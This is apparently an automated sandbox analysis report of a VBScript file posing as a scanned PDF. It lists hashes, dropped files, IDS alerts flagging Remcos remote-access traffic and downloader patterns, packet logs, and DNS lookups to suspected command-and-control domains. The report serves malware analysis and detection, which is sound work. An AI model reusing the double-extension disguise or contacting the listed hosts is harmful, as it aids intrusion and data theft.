                                                              SHA-512:192BB1AF8F9E1BCFF6AC5C7A4B8837677EF2A77BEE9FF78C47F2AB6EA246F98D3FDE8C327C8F594D2A5B4E5DDC76F4377F48E9567970D31B250D2A829B8A2096
                                                              Malicious:false
                                                              Preview:
                                                              {
                                                                "geoplugin_request":"216.52.183.150",
                                                                "geoplugin_status":200,
                                                                "geoplugin_delay":"1ms",
                                                                "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
                                                                "geoplugin_city":"New York",
                                                                "geoplugin_region":"New York",
                                                                "geoplugin_regionCode":"NY",
                                                                "geoplugin_regionName":"New York",
                                                                "geoplugin_areaCode":"",
                                                                "geoplugin_dmaCode":"501",
                                                                "geoplugin_countryCode":"US",
                                                                "geoplugin_countryName":"United States",
                                                                "geoplugin_inEU":0,
                                                                "geoplugin_euVATrate":false,
                                                                "geoplugin_continentCode":"NA",
                                                                "geoplugin_continentName":"North America",
                                                                "geoplugin_latitude":"40.7157",
                                                                "geoplugin_longitude":"-74",
                                                                "geoplugin_locationAccuracyRadius":"20",
                                                                "geoplugin_timezone":"America\/New_York",
                                                                "geoplugin_currencyCode":"USD",
                                                                "geoplugin_currencySymbol":"$",
                                                                "geoplugin_currencySymbol_UTF8":"$",
                                                                "geoplugin_currencyConverter":0
                                                              }
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):8003
                                                              Entropy (8bit):4.840877972214509
                                                              Encrypted:false
                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                              MD5:106D01F562D751E62B702803895E93E0
                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                              Malicious:false
                                                              Preview:PSMODULECACHE (PowerShell module analysis cache) referencing C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 and C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 together with their exported command names (Install-Module, Uninstall-Module, Update-Module, Find-Module, Save-Module, Publish-Module, Install-Script, Find-Script, Register-PSRepository and the other PowerShellGet commands); binary cache content not reproduced
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1628158735648508
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                              MD5:3A925CB766CE4286E251C26E90B55CE8
                                                              SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                              SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                              SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                              Malicious:false
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):499656
                                                              Entropy (8bit):5.848823387985694
                                                              Encrypted:false
                                                              SSDEEP:12288:4SvfUeB3ZpJuVbmFgR+G1PFPnuxyZBBNhUYf:4EtduVbmFgRdF1n8yBNhrf
                                                              MD5:9C5B82736C863DD8D126471D00EB7A3E
                                                              SHA1:3C2D70D4AE1EB5578213EF898AAA09D5528793DB
                                                              SHA-256:D912A2830162ABCA8C41F77A05B3A62E843FC359808F0091FCC4252EF10DA6DB
                                                              SHA-512:E5DD3DC4E2188F54EB12C73630BD9C756D803A07F5915233FCA0402D910CBCB31BD85A69174D482F3550213323CA6DEF3C7EDF8455F700C020BB696E4CE0823C
                                                              Malicious:false
                                                              File type:ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.350099707536699
                                                              TrID:
                                                              • Visual Basic Script (13500/0) 100.00%
                                                              File name:Scanned_22C-6e24090516030.pdf.vbs
                                                              File size:27'621 bytes
                                                              MD5:1c78cc71bf8db131a33f156feff9ec4d
                                                              SHA1:af06e517411ac017868488d8a7173bb2d5d98012
                                                              SHA256:e4c5f96a9fbb32b0754fba2c4bd4a3773a77d8018b7aa5d572b067777de7165b
                                                              SHA512:868f20c758607c5e98310a437eb621246928564936ab6fb311f825ec0554b1181eacbddd9335b897fe85e488fc2feba69009a5f5c5539a76f605c22ae5948a32
                                                              SSDEEP:384:XrCiX5aUO2sEZovx4IhH4iwTrUtngui1/92lP8oyrZsqfQAU:Xe+pvyl4vT4o3/rm
                                                              TLSH:9DC21BC0CC423FD90DFB27B25F743560D4B0C4A65A3551697B2BA868782DBD2AC285DF
                                                              File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                                              Icon Hash:68d69b8f86ab9a86
                                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                              2024-10-21T17:07:53.024386+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.11 | 49973 | 199.103.62.205 | 443 | TCP
                                                              2024-10-21T17:07:56.585178+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.11 | 49975 | 193.187.91.214 | 65253 | TCP
                                                              2024-10-21T17:07:57.542508+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.11 | 49976 | 193.187.91.214 | 53241 | TCP
                                                              2024-10-21T17:07:59.126300+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.11 | 49977 | 178.237.33.50 | 80 | TCP
                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Oct 21, 2024 17:07:04.366029978 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366069078 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366432905 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366447926 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366494894 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366501093 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366539955 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366594076 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366609097 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366655111 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366655111 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366667032 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366687059 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366702080 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366738081 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.366744041 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.366784096 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.367465019 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367480993 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367531061 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.367537022 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367568970 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.367604971 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367619038 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367661953 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.367667913 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.367707014 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.400700092 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.400727034 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.400855064 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.400872946 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.400912046 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.401401043 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.401417017 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.401583910 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.401592016 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.401634932 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.440872908 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.440897942 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.440982103 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441015005 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441016912 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.441031933 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441193104 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.441679001 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441694975 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441734076 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.441740036 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441761971 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.441823959 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441874981 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.441883087 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441895008 CEST44349736199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:04.441942930 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:04.445255995 CEST49736443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.340687990 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.340744019 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:52.341058969 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.365173101 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.365204096 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:52.827831984 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:52.827960968 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.914165020 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.914216995 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:52.914591074 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:52.914958000 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.918776989 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:52.963344097 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.024430037 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.025057077 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.108243942 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108259916 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108304977 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108355045 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.108376980 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108393908 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108402967 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.108407974 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.108423948 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.108458996 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.187568903 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.187596083 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.187642097 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.187659979 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.187675953 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.187695980 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.189021111 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.189037085 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.189084053 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.189096928 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.189129114 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.191091061 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.191109896 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.191220999 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.191232920 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.191272974 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.230464935 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.230492115 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.230540991 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.230556011 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.230568886 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.230592966 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.268573046 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.268604040 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.268645048 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.268666983 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.268686056 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.268702984 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.269201994 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.269233942 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.269263029 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.269273996 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.269294024 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.269309998 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.271028042 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.271047115 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.271106958 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.271119118 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.271162987 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.271178961 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.271915913 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.271945953 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.271975040 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.271982908 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.272027016 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.272044897 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.273020029 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273041964 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273085117 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.273096085 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273139954 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.273870945 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273888111 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273922920 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.273931026 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.273952961 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.273971081 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.311655998 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.311685085 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.311731100 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.311758041 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.311774015 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.311789989 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.349116087 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349150896 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349201918 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.349220991 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349255085 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.349277973 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.349525928 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349541903 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349592924 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.349602938 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.349647045 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.350183964 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.350200891 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.350260019 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.350270033 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.350322008 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.354619980 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.354646921 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.354715109 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.354728937 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.354782104 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.354965925 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.354988098 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.355031967 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.355037928 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.355065107 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.355081081 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.355495930 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.355513096 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.355576992 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.355586052 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.355623007 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357101917 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357122898 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357187986 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357202053 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357214928 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357244015 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357248068 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357304096 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357310057 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357333899 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357367039 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357916117 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357948065 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.357975960 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.357983112 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.358022928 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.358041048 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.358167887 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.358196020 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.358222961 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.358227015 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.358264923 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.358278036 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.358969927 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.358998060 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.359074116 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.359082937 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.359117985 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.392858028 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.392885923 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.392932892 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.392949104 CEST44349973199.103.62.205192.168.2.11
                                                              Oct 21, 2024 17:07:53.392971992 CEST49973443192.168.2.11199.103.62.205
                                                              Oct 21, 2024 17:07:53.392985106 CEST49973443192.168.2.11199.103.62.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 21, 2024 17:06:59.984863043 CEST | 50934 | 53 | 192.168.2.11 | 1.1.1.1
Oct 21, 2024 17:07:00.000509977 CEST | 53 | 50934 | 1.1.1.1 | 192.168.2.11
Oct 21, 2024 17:07:03.225142002 CEST | 64337 | 53 | 192.168.2.11 | 1.1.1.1
Oct 21, 2024 17:07:03.414567947 CEST | 53 | 64337 | 1.1.1.1 | 192.168.2.11
Oct 21, 2024 17:07:55.139040947 CEST | 61606 | 53 | 192.168.2.11 | 1.1.1.1
Oct 21, 2024 17:07:56.008833885 CEST | 53 | 61606 | 1.1.1.1 | 192.168.2.11
Oct 21, 2024 17:07:58.525832891 CEST | 49322 | 53 | 192.168.2.11 | 1.1.1.1
Oct 21, 2024 17:07:58.536153078 CEST | 53 | 49322 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 21, 2024 17:06:59.984863043 CEST | 192.168.2.11 | 1.1.1.1 | 0x3049 | Standard query (0) | gormezl_6777.6777.6777.677e | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:03.225142002 CEST | 192.168.2.11 | 1.1.1.1 | 0x7b1d | Standard query (0) | www.groupriam.com | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:55.139040947 CEST | 192.168.2.11 | 1.1.1.1 | 0xd6b2 | Standard query (0) | blackass.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:58.525832891 CEST | 192.168.2.11 | 1.1.1.1 | 0x8a05 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 21, 2024 17:06:56.146229982 CEST | 1.1.1.1 | 192.168.2.11 | 0x40db | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:06:56.146229982 CEST | 1.1.1.1 | 192.168.2.11 | 0x40db | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:00.000509977 CEST | 1.1.1.1 | 192.168.2.11 | 0x3049 | Name error (3) | gormezl_6777.6777.6777.677e | none | none | A (IP address) | IN (0x0001) | false
Oct 21, 2024 17:07:03.414567947 CEST | 1.1.1.1 | 192.168.2.11 | 0x7b1d | No error (0) | www.groupriam.com | groupriam.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 21, 2024 17:07:03.414567947 CEST | 1.1.1.1 | 192.168.2.11 | 0x7b1d | No error (0) | groupriam.com | | 199.103.62.205 | A (IP address) | IN (0x0001) | false
